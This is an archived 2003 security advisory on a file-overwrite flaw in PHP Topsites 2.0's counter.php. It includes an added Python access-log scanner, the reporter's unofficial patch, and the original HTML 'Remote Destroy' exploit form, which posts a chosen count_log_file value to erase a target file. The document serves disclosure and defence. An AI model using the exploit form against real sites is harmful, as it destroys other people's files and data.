PHP Topsites 'counter.php' Input Validation Flaw Lets Remote Users Modify Files on the System
SecurityTracker Alert ID: 1006368
CVE Reference: GENERIC-MAP-NOMATCH
Date: Mar 24 2003
Impact: Denial of service via network, Modification of system information, Modification of user information
Exploit Included: Yes
Version(s): 2.0
Description: Trent Pb reported a vulnerability in PHP Topsites. A remote user can modify some files on the server.
A remote user can reportedly specify an arbitrary file name for the 'count_log_file' variable to cause the counter.php script to overwrite the specified file with a series of numbers.
[Editor's note: The report does not indicate if a relative path or absolute path to another directory is permitted or not.]
A demonstration exploit web form is provided in the Source Message.
Skull Hacker is credited with discovering this flaw.
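As an added defender's example (not part of the SecurityTracker entry or of the report it summarizes): a small Python script that scans web-server access-log lines for requests to counter.php whose query string carries a count_log_file parameter, which is the condition the description above identifies. The log lines below are constructed for illustration; only the parameter name and script name come from the advisory, and the hosts, timestamps and file names are made up. Because the demonstration form posts to a URL whose query string holds the parameter, the value appears in the request line and therefore in the access log; a parameter sent only in a POST body would not.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format).  These are not
# real hosts or real requests; they only illustrate what the advisory describes.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Mar/2003:19:04:10 +0800] "GET /topsites/counter.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"
203.0.113.5 - - [24/Mar/2003:19:04:11 +0800] "POST /topsites/counter.php?count_log_file=index.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"
198.51.100.7 - - [24/Mar/2003:19:05:02 +0800] "GET /topsites/counter.php?count_log_file=../other/page.html HTTP/1.0" 200 12 "-" "curl/7.9"
198.51.100.7 - - [24/Mar/2003:19:05:03 +0800] "GET /topsites/index.php HTTP/1.0" 200 4021 "-" "curl/7.9"
"""

# Minimal Combined Log Format matcher: client, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Request parameters the script treats as file paths.  The advisory names only
# count_log_file, so only that one is listed here.
PATH_PARAMS = {"count_log_file"}


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_file_overrides(log_text):
    """Flag requests to counter.php that carry a path-like parameter in the query string.

    Returns a list of dicts with the client IP, timestamp, HTTP method, parameter
    name, the file name the client supplied, and whether that name tries to leave
    the script's directory.  POST bodies are not recorded in access logs, so a
    parameter sent only in the body is invisible here; that is a limitation of
    this check, not evidence the request was harmless.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if not url.path.lower().endswith("/counter.php"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        for name in sorted(PATH_PARAMS & set(query)):
            for value in query[name]:
                findings.append({
                    "ip": rec["ip"],
                    "ts": rec["ts"],
                    "method": rec["method"],
                    "param": name,
                    "file": value,
                    # A path separator or ".." means the client supplied a path
                    # outside the script's own directory; escalate those first.
                    "traversal": ("/" in value or "\\" in value or ".." in value),
                })
    return findings


if __name__ == "__main__":
    for f in find_file_overrides(SAMPLE_LOG):
        flag = " [traversal]" if f["traversal"] else ""
        print(f"{f['ts']} {f['ip']} {f['method']} {f['param']}={f['file']}{flag}")
```

Any hit is worth checking against the files the web server process can write, since the Impact line below describes exactly those as being at risk; after the counter.php patch from the Source Message is applied, the parameter is ignored by the script, but its presence in the log still shows that someone tried.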
Impact: A remote user can overwrite files on the target system that are writable by the web server process.
Solution: No vendor solution was available at the time of this entry. The author of the report has provided an unofficial patch for the counter.php file, available in the Source Message.
Vendor URL: www.itop10.net/products/
Cause: Access control error, Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: "Trent Pb" <trent_pb@hotmail.com>
Message History:
None.
Source Message Contents
Date: Mon, 24 Mar 2003 19:04:10 +0800
From: "Trent Pb" <trent_pb@hotmail.com>
Subject: PHP TopSites 2.0 Remote Destroy Exploit
Hello, I found this exploit in PHP Topsites 2.0; all the info is in the text file. Thanks!
Attachment: Topsites.txt
---------------------------------------------------------------
PHP Topsites 2.0 Remote Destroy Exploit
Discovered By Skull Hacker 24/3/03
---------------------------------------------------------------
Greetz, I found a vulnerability in counter.php on PHP Topsites 2.0. A remote attacker can open and replace a file of their choice on the server with lines of numbers. I have included a patch and exploit as seen below.
Exploit:
Simply change the URL to the vulnerable TopSite URL, save, run and click destroy!
<HTML>
<HEAD>
<TITLE>PHP Topsites 2.0 Remote Destroy Exploit. Found By Skull
Hacker</TITLE>
</HEAD>
<BODY>
<P><B><FONT FACE="Arial">PHP
Topsites 2.0 Remote Destroy Exploit
- Discovered By Skull Hacker
<FONT SIZE="1">
<A HREF="mailto:skull_hacker@hackersof2000.net">
skull_hacker@hackersof2000.net</A>
.<BR>
<BR>
</FONT><FONT SIZE="2">Click
destroy and the Topsites will then be
fully erased and replaced with
numbers. Enjoy ! note: Change the count_log_file=index.php too any file u
want too overwrite on the server.<BR>
</FONT></FONT></B></P>
<FORM METHOD="POST"
ACTION="http://www.sitetoohack.com/counter.php?count_log_file=index.php">
<INPUT TYPE="submit" VALUE="Destroy" NAME="B1"></P>
</FORM>
</BODY>
</HTML>
Patch:
Open counter.php and replace all of it with this, and remember to change the log file in this patch.
<?php
// Patch for TopSites 2.0 counter.php Remote Destroy Exploit by Skull Hacker.
// The log file name is fixed here instead of being taken from the request.
$count_log_file = "--Your Log File--";
$counter_file_line = file($count_log_file);       // current count is the first line of the file
$counter_file_line[0] = $counter_file_line[0] + 1;
$cf = fopen($count_log_file, "w");
flock($cf, LOCK_EX);                              // exclusive lock (LOCK_EX == 2) while rewriting
fputs($cf, "$counter_file_line[0]");
fclose($cf);
$display = $counter_file_line[0];
if ($counter_file_line[0] >= 10000000) {
    $display = round($counter_file_line[0] / 1000000) . "M";
} elseif ($counter_file_line[0] >= 100000) {
    $display = round($counter_file_line[0] / 1000) . "K";
}
echo $display;
?>